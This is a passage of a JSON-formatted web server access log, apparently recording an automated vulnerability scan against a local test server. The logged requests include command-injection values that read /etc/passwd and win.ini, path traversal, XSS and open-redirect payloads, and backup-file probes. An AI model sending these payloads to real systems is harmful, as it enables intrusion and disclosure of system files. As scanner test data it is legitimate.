HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\x22%20onmouseover=alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 